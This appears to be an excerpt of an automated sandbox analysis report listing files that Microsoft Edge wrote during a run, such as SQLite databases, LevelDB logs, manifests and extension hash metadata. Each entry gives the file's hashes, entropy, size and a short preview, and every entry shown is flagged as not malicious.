                                                                                                                                          MD5:CD04461D597F6BA7A2F83D8F0535ADD6
                                                                                                                                          SHA1:8A2B4A2A7F77A0B5FC3B2902590CE713DE7EACA2
                                                                                                                                          SHA-256:0F6CDE706574A8FAA190B75DADA347452C860CE5C00EF77AB65D14B61CD680AA
                                                                                                                                          SHA-512:110B4B5C492E6C08E22D370C2034DA43B30932C7F50D24EA961597248BBF12258036841FDBD6499DDB42798063BC542144AFABC129E072D5432C6E59E7FF33D0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):10240
                                                                                                                                          Entropy (8bit):0.8708334089814068
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                          MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                          SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                          SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                          SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):348
                                                                                                                                          Entropy (8bit):5.1868099615040695
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C16dvUDy39+q2P923oH+TcwtnG2tMsIFUt8N16dqJZmw+N16dq9VkwO923oH+Tci:CIdN+v4Yebn9GFUt8NIU/+NI0V5LYebB
                                                                                                                                          MD5:FB7D83E1756F0083365BF4152B7E407A
                                                                                                                                          SHA1:76AC7265D13641ECC4B32C2452F6A5A9E11CBB7D
                                                                                                                                          SHA-256:4B9A603D8A8806D38E07D78B57F20453FA77B047B5A44FB8314A3155B5C0E343
                                                                                                                                          SHA-512:921AB01D719E7A51EBD6F53E8E0B63FBEC97A26C3BD12115B84ACDC9294B85A8DE36D4FA029E725EC67CECDFF1723123260C5D4D085E7363EE061812E5257B67
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.480 1fbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/04/12-09:14:39.481 1fbc Recovering log #3.2024/04/12-09:14:39.481 1fbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):348
                                                                                                                                          Entropy (8bit):5.1868099615040695
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C16dvUDy39+q2P923oH+TcwtnG2tMsIFUt8N16dqJZmw+N16dq9VkwO923oH+Tci:CIdN+v4Yebn9GFUt8NIU/+NI0V5LYebB
                                                                                                                                          MD5:FB7D83E1756F0083365BF4152B7E407A
                                                                                                                                          SHA1:76AC7265D13641ECC4B32C2452F6A5A9E11CBB7D
                                                                                                                                          SHA-256:4B9A603D8A8806D38E07D78B57F20453FA77B047B5A44FB8314A3155B5C0E343
                                                                                                                                          SHA-512:921AB01D719E7A51EBD6F53E8E0B63FBEC97A26C3BD12115B84ACDC9294B85A8DE36D4FA029E725EC67CECDFF1723123260C5D4D085E7363EE061812E5257B67
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.480 1fbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/04/12-09:14:39.481 1fbc Recovering log #3.2024/04/12-09:14:39.481 1fbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):16
                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):540
                                                                                                                                          Entropy (8bit):5.9291434921323525
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:Tg8PNOWUwvwJxyaLm/FtUoRI8Tm/qVIRB6tFRHn:Tgu9aK0GIMVIRBwRH
                                                                                                                                          MD5:1A38A080DCCF616CE029F61E3CDBA32B
                                                                                                                                          SHA1:A3FECB431439C152859C1A352D48F014162520B0
                                                                                                                                          SHA-256:E48974B70F1E126F4D7A00BFB98C8F58A89E1C5F1B31FF04A8BD4B80663F84BC
                                                                                                                                          SHA-512:5F5609584508A0545281C91F57B6E3CB4B31EEB5C87766F9549AD48B1F8357B5E319955C1A373747C1F051413C8C8B8771114013A1943207ABC2327D164058BE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...m.................DB_VERSION.1..8.................&QUERY_TIMESTAMP:domains_config_gz2.*.*.13357379697041275..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.75/asset?sv=2017-07-29&sr=c&sig=R83mlHRCqeHRG9T0loza5cz3U8zjuZzQy2wVvoSHGHw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-06-30T00%3A00%3A00Z&sp=r&assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":75},"hash":"EwG2gkfquexLj6u3yjHyiL4YQwdU318k1Hub+1rSDMI=","size":391864}]

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):16
                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):309
                                                                                                                                          Entropy (8bit):5.140521237113201
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:COM1923oH+Tcwtk2WwnvB2KLlIsjIq2P923oH+Tcwtk2WwnvIFUv:COhYebkxwnvFLasjIv4YebkxwnQFUv
                                                                                                                                          MD5:7FF2E6F45C5BA2B274AB6A31D6547ED2
                                                                                                                                          SHA1:BC561BB8F57BD695EFA468A9C1EB594211871390
                                                                                                                                          SHA-256:986D22D8C03B993FC1DB86E3C01F395084D8005A091F481223DDF0BEEDA400CA
                                                                                                                                          SHA-512:A3ED9951498711417F10845AF8BC8CDBF9756A100186722D418E6933D91064B86F41B7634318CAFE6CE17BC5FD1C13B00E6419AA192F64705D8D4D0C851B24A5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:43.831 9a4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/04/12-09:14:43.948 9a4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):41
                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):437
                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                          MD5:3D2A973B403151038F461AA3D096CC17
                                                                                                                                          SHA1:8AEF381FC552E1BB0F005B76A8C3ED6D33B6F3DD
                                                                                                                                          SHA-256:FA0AEB7D0229D1AC966167C27DAA5A3CD922E4B1E3F15A6A14D668A59C890FBB
                                                                                                                                          SHA-512:96843A985089D1E43D183D43E82E14B9D150C331AA250A5CCD3C906AAE81D475B4A5A23DF9DD839E85F57672A083D8CF831310F52FCC610F8B96A42A1A693ACB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):324
                                                                                                                                          Entropy (8bit):5.2121918625165025
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C18dfN+q2P923oH+Tcwt8aPrqIFUt8N18dJmZmw+N18dgSNVkwO923oH+Tcwt8a4:CWT+v4YebL3FUt8NWK/+NWlV5LYebQJ
                                                                                                                                          MD5:08997CB39227FB9600D17A14ECDD9D5F
                                                                                                                                          SHA1:DE86D5AA4213BC22EDD4892C64B017EF96333165
                                                                                                                                          SHA-256:0B0EA66D082C53F6FEF934B0F5BD90189C53883249BA4D26C1EB4C5940704E2C
                                                                                                                                          SHA-512:A31E00830E41BF31A5A42DAD94767E286C229FEA7D73025CCE2EBB157FD64FE77705D5276805EA85E88E8CBDBD4BF4DC91A1E84D7F3D654DC376FD5A24A07FBF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.285 1d7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/04/12-09:14:39.286 1d7c Recovering log #3.2024/04/12-09:14:39.287 1d7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):324
                                                                                                                                          Entropy (8bit):5.2121918625165025
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C18dfN+q2P923oH+Tcwt8aPrqIFUt8N18dJmZmw+N18dgSNVkwO923oH+Tcwt8a4:CWT+v4YebL3FUt8NWK/+NWlV5LYebQJ
                                                                                                                                          MD5:08997CB39227FB9600D17A14ECDD9D5F
                                                                                                                                          SHA1:DE86D5AA4213BC22EDD4892C64B017EF96333165
                                                                                                                                          SHA-256:0B0EA66D082C53F6FEF934B0F5BD90189C53883249BA4D26C1EB4C5940704E2C
                                                                                                                                          SHA-512:A31E00830E41BF31A5A42DAD94767E286C229FEA7D73025CCE2EBB157FD64FE77705D5276805EA85E88E8CBDBD4BF4DC91A1E84D7F3D654DC376FD5A24A07FBF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.285 1d7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/04/12-09:14:39.286 1d7c Recovering log #3.2024/04/12-09:14:39.287 1d7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):437
                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                          MD5:3D2A973B403151038F461AA3D096CC17
                                                                                                                                          SHA1:8AEF381FC552E1BB0F005B76A8C3ED6D33B6F3DD
                                                                                                                                          SHA-256:FA0AEB7D0229D1AC966167C27DAA5A3CD922E4B1E3F15A6A14D668A59C890FBB
                                                                                                                                          SHA-512:96843A985089D1E43D183D43E82E14B9D150C331AA250A5CCD3C906AAE81D475B4A5A23DF9DD839E85F57672A083D8CF831310F52FCC610F8B96A42A1A693ACB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):328
                                                                                                                                          Entropy (8bit):5.192091325045352
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C16dV/SN+q2P923oH+Tcwt865IFUt8N16d0mZmw+N16d0iVkwO923oH+Tcwt86+e:CIVqN+v4Yeb/WFUt8NIf/+NIfV5LYebD
                                                                                                                                          MD5:765B6D4B8C8130C289212C8F6F782777
                                                                                                                                          SHA1:50927274C8C0352906947F033ED5DFDA91E9725B
                                                                                                                                          SHA-256:2BA93EE71F0BB566554B5DDACEBB3E74E4B1DD4388B260463194B8C6822A9E78
                                                                                                                                          SHA-512:807D86E7091180230E6B904EE24EA5F411507B9CDC6C122006703CABCC4524BC51D678701E222EEAA3B8A910D32CC8EBA52871DE9E56853A826FB74F719F3ABB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.482 1d7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/04/12-09:14:39.483 1d7c Recovering log #3.2024/04/12-09:14:39.483 1d7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):328
                                                                                                                                          Entropy (8bit):5.192091325045352
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C16dV/SN+q2P923oH+Tcwt865IFUt8N16d0mZmw+N16d0iVkwO923oH+Tcwt86+e:CIVqN+v4Yeb/WFUt8NIf/+NIfV5LYebD
                                                                                                                                          MD5:765B6D4B8C8130C289212C8F6F782777
                                                                                                                                          SHA1:50927274C8C0352906947F033ED5DFDA91E9725B
                                                                                                                                          SHA-256:2BA93EE71F0BB566554B5DDACEBB3E74E4B1DD4388B260463194B8C6822A9E78
                                                                                                                                          SHA-512:807D86E7091180230E6B904EE24EA5F411507B9CDC6C122006703CABCC4524BC51D678701E222EEAA3B8A910D32CC8EBA52871DE9E56853A826FB74F719F3ABB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.482 1d7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/04/12-09:14:39.483 1d7c Recovering log #3.2024/04/12-09:14:39.483 1d7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1311
                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWZ:
                                                                                                                                          MD5:09D1747D04F96DCDC46D11A9EB944BBD
                                                                                                                                          SHA1:D97E729DA20985803310FEEABAA56F0AFD7C75DD
                                                                                                                                          SHA-256:DB46B60B60B40BE345DB2412348B7E6086BE7BA0648844090CA008516E57094F
                                                                                                                                          SHA-512:3285E89A2D553A8E10B016AF49BDD9B9986645C109F2126379ABDAEDA362ED17ADB6D329F4FAA5568F49859C7D0B35C0C70252DDBDAD55FFCBF4784A31EDF241
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):324
                                                                                                                                          Entropy (8bit):5.1305382489179125
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:CyL+q2P923oH+Tcwt8NIFUt8NPZmw+NPVkwO923oH+Tcwt8+eLJ:Cyyv4YebpFUt8NP/+Nd5LYebqJ
                                                                                                                                          MD5:8D91691F72E30DC75EEA8C7AD353549B
                                                                                                                                          SHA1:0ABF2B7DFB337F7BA9755F6613131B3F47ACF3DE
                                                                                                                                          SHA-256:1128BA618A7B2B0289C808C10E476FF29766E351FF8BB8A2D187DF935B996FE2
                                                                                                                                          SHA-512:DCAA24B2244B53D1935C8C8E95E1BE6F4569582FDD9AC18296AD799F71492CE3AACF47CA9EFAD0149F86F14F9299459F50C4B5157C07264B4E0280E82B3EC34E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:40.106 1f88 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/04/12-09:14:40.107 1f88 Recovering log #3.2024/04/12-09:14:40.107 1f88 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):324
                                                                                                                                          Entropy (8bit):5.1305382489179125
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:CyL+q2P923oH+Tcwt8NIFUt8NPZmw+NPVkwO923oH+Tcwt8+eLJ:Cyyv4YebpFUt8NP/+Nd5LYebqJ
                                                                                                                                          MD5:8D91691F72E30DC75EEA8C7AD353549B
                                                                                                                                          SHA1:0ABF2B7DFB337F7BA9755F6613131B3F47ACF3DE
                                                                                                                                          SHA-256:1128BA618A7B2B0289C808C10E476FF29766E351FF8BB8A2D187DF935B996FE2
                                                                                                                                          SHA-512:DCAA24B2244B53D1935C8C8E95E1BE6F4569582FDD9AC18296AD799F71492CE3AACF47CA9EFAD0149F86F14F9299459F50C4B5157C07264B4E0280E82B3EC34E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:40.106 1f88 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/04/12-09:14:40.107 1f88 Recovering log #3.2024/04/12-09:14:40.107 1f88 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):429
                                                                                                                                          Entropy (8bit):5.809210454117189
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                          MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                          SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                          SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                          SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):8720
                                                                                                                                          Entropy (8bit):0.2191763562065486
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:vs/RtFlljq7A/mhWJFuQ3yy7IOWUFdweytllrE9SFcTp4AGbNCV9RUIYs:EC75fOLd0Xi99pEYR
                                                                                                                                          MD5:34B7218E5402F9E8BBD38F9A1C8F1EFB
                                                                                                                                          SHA1:85CE1F0848C3257DDD4515B6C8AA39062FDCD08C
                                                                                                                                          SHA-256:342531E12CAD51FE9969D0C397BD5137F2C4AC0F7C6499711A4CE7267A3139C7
                                                                                                                                          SHA-512:E06D30CEFF374E5ACEDFB5045CE95654475667B0FBB1FF0D0EE63954AB6D4AE5BB8D255A767ACA9E2399D00478F0030D92CCE22DF91EB7D32D2DE84C10D47431
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.............T....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):408
                                                                                                                                          Entropy (8bit):5.286777045276449
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:CHCVv4Yeb8rcHEZrELFUt8Ndg/+NdI5LYeb8rcHEZrEZSJ:p54Yeb8nZrExg831SLYeb8nZrEZe
                                                                                                                                          MD5:86DADD5C1FAC10CBE2B87216E23323E3
                                                                                                                                          SHA1:1E5B70F74E59E182FD506F872A24EE2C58343DEE
                                                                                                                                          SHA-256:55286226835F6282C7B0912D2E29AE726C1BFE8D7F4646686BF8D11B9DB793BD
                                                                                                                                          SHA-512:D4CE60AD68955913407825863E0B809B40278B42FBAC1DD7C18FC047488DC7DA6E784B6B4DDE26801929FCE366BA7D0CEBBA3504396AC7D1072C28B0C657E064
                                                                                                                                          Malicious:false
